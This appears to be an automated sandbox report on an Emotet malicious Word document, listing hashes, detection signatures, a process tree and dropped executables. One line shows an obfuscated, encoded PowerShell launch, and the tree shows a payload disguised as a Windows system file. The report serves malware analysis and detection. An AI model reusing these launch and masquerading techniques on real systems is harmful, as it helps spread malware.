Analysis

  • max time kernel: 141s
  • max time network: 150s
  • platform: windows10_x64
  • resource: win10v200722
  • submitted: 15-10-2020 07:43

General

  • Target: emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc
  • Size: 142KB
  • MD5: 0b5d5c4468a31e83e1ec8a0d8b120496
  • SHA1: 68ac3e73c7bb88172984109977a8dc0f2c095522
  • SHA256: aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63
  • SHA512: 44b5682ac2f14a0de257bcab0eb42fc725536be8d9ecc432ca3a19ff3425c9b867a85b3d3b37cb1416f76b51d86ae2fcb563641f9fd6b18de0b34024dbc48fd1

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: URLs

Extracted

  • Family: emotet
  • Botnet: Epoch1
  • C2


  • rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3956
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD 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
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
      "C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
        "C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:488

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry (2): T1012
    • System Information Discovery (2): T1082


Downloads

  • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
    MD5: 3b7449cd8c9047abebf15753df263af6
    SHA1: 7e48a9edf1700393af6368b8b8de7ec3f4828f87
    SHA256: 537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7
    SHA512: 300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07
  • C:\Users\Admin\owgY_PM\gtGm_Y5\X_ec45.exe
    MD5: 3b7449cd8c9047abebf15753df263af6
    SHA1: 7e48a9edf1700393af6368b8b8de7ec3f4828f87
    SHA256: 537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7
    SHA512: 300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07
  • C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
    MD5: 3b7449cd8c9047abebf15753df263af6
    SHA1: 7e48a9edf1700393af6368b8b8de7ec3f4828f87
    SHA256: 537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7
    SHA512: 300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

  • memory/488-14-0x0000000000000000-mapping.dmp
  • memory/488-16-0x0000000002100000-0x000000000211F000-memory.dmp (Filesize: 124KB)
  • memory/488-17-0x0000000002120000-0x000000000213E000-memory.dmp (Filesize: 120KB)
  • memory/1136-9-0x0000000000000000-mapping.dmp
  • memory/1136-12-0x00000000022C0000-0x00000000022DF000-memory.dmp (Filesize: 124KB)
  • memory/1136-13-0x00000000022E0000-0x00000000022FE000-memory.dmp (Filesize: 120KB)
  • memory/2672-8-0x0000029C73600000-0x0000029C73601000-memory.dmp (Filesize: 4KB)
  • memory/2672-7-0x0000029C73450000-0x0000029C73451000-memory.dmp (Filesize: 4KB)
  • memory/2672-6-0x00007FF8FA470000-0x00007FF8FAE5C000-memory.dmp (Filesize: 9MB)
  • memory/3956-0-0x00007FF901A90000-0x00007FF902156000-memory.dmp (Filesize: 6MB)